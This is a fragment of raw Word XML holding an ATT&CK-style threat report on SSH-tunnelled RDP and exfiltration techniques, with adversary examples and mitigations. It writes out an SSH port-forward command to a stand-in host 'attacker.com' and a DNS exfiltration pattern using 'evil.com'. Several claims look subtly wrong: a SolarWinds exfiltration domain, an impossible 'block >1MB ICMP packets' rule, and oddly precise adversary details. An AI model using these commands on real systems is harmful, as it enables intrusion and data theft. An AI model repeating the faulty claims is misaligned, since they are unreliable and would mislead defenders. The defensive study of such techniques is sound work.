          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mechanism: Attackers use SSH tunnels to forward Remote Desktop Protocol (RDP) traffic through encrypted channels. Commands like ssh -L 3389:internal-host:3389 user@attacker.com redirect traffic to bypass firewalls.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversary Example: Scattered Spider used Plink (SSH CLI tool) to tunnel RDP into victim networks, enabling lateral movement without triggering alerts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Inspect DNS traffic for long/unusual domain names; block DoH/DoT at firewalls 12.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Monitor SSH for port-forwarding flags (-L/-R).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00316B94" w:rsidRDefault="00316B94" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00316B94" w:rsidRDefault="00316B94" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00316B94" w:rsidRPr="00984DC3" w:rsidRDefault="00316B94" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A74512" w:rsidRPr="00A74512" w:rsidRDefault="00316B94" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Exfiltration</w:t>
      </w:r>
      <w:r w:rsidR="00A74512">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A74512" w:rsidRPr="00A74512">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Tactic (TA0010)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00316B94" w:rsidRDefault="00A74512" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A74512">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A74512">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exfiltration involves techniques adversaries use to steal and transfer data from compromised systems to attacker-controlled infrastructure. This final stage of the attack lifecycle often follows Collection and enables espionage, financial gain, or further attacks. Adversaries employ stealthy methods to avoid detection while moving large volumes of data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRDefault="00550119" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1) Technique: Automated Exfiltration (T1020)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Adversaries use scripts or malware to automatically steal and transmit data without manual intervention.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Sub-technique: Traffic Duplication (T1020.001)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Definition: Adversaries automate data theft by copying and blending stolen data with legitimate network traffic (e.g., DNS, cloud backups). This sub-technique masks exfiltration within normal traffic patterns to evade data loss prevention (DLP) tools.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Key Procedures</w:t>
      </w:r>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>DNS-Based Data Duplication via Subdomain Spoofing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Malware encodes stolen files into DNS queries (e.g., data1.data2.evil.com) and sends them to attacker-controlled DNS servers. Legitimate DNS traffic is mirrored to avoid suspicion.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Adversary Example: APT29 exfiltrated SolarWinds data by embedding it in DNS lookups to domains like api.solarwinds.work, mimicking legitimate API calls.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Impact: Bypasses DLP as DNS is rarely inspected for large data transfers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Cloud Sync Abuse for Data Blending</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Attackers configure malware to copy stolen files to folders synced with services like OneDrive or Dropbox. Exfiltration occurs under the guise of normal user activity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Adversary Example: APT41 used Dropbox API to auto-upload intellectual property from compromised R&amp;D servers, evading network egress alerts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Deploy DNS filtering to block queries to unknown domains.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Monitor cloud sync clients for anomalous upload volumes (e.g., 10GB from a workstation).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="363"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2) Technique: Data Transfer Size Limits (T1030)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="363"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adversaries bypass network thresholds by splitting data into small chunks (e.g., 1MB) to avoid triggering DLP/IDS alerts. This technique exploits trust in "normal" transaction sizes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRDefault="00550119" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="363"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="363"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Key Procedures</w:t>
      </w:r>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>FTP/HTTP Chunking with Time Delays</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Tools like Rclone split files into parts (e.g., data.zip.001, data.zip.002) and upload them slowly via FTP/HTTP. Delays between transfers mimic human activity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRDefault="00550119" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Adversary Example: Lazarus Group exfiltrated bank credentials via HTTP chunks of 512KB, sent every 30 minutes to avoid threshold alerts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00550119">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ICMP Packet Fragmentation for Stealth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Data is split into ICMP packet fragments (e.g., 64 bytes each) and sent to a listener IP. Reassembly occurs on the attacker’s server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Adversary Example: APT10 used PingC2 to exfiltrate data via fragmented pings, evading IDS that ignored small ICMP payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Enforce egress traffic shaping (e.g., block &gt;1MB ICMP packets).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Alert on repeated small transfers to the same IP (e.g., 50x 512KB uploads).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="363"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="363"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3) Technique: Exfiltration Over C2 Channel (T1041)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="363"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adversaries piggyback stolen data on existing command-and-control (C2) connections (e.g., HTTPS, WebSockets). This avoids creating new network flows and reuses trusted channels.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00823D78" w:rsidRDefault="00823D78" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="363"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00823D78" w:rsidRDefault="00550119" w:rsidP="00550119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="363"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823D78">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Key Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00823D78" w:rsidRDefault="00550119" w:rsidP="00823D78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823D78">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>HTTPS C2 with Base64-Embedded Data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00823D78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Malware encodes files in Base64 and sends them as "normal" POST requests to C2 servers (e.g., /api/telemetry). Encryption (TLS) hides the content.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00823D78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Adversary Example: Emotet exfiltrated banking credentials via HTTPS C2 channels, blending with legitimate web traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00823D78" w:rsidRDefault="00550119" w:rsidP="00823D78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
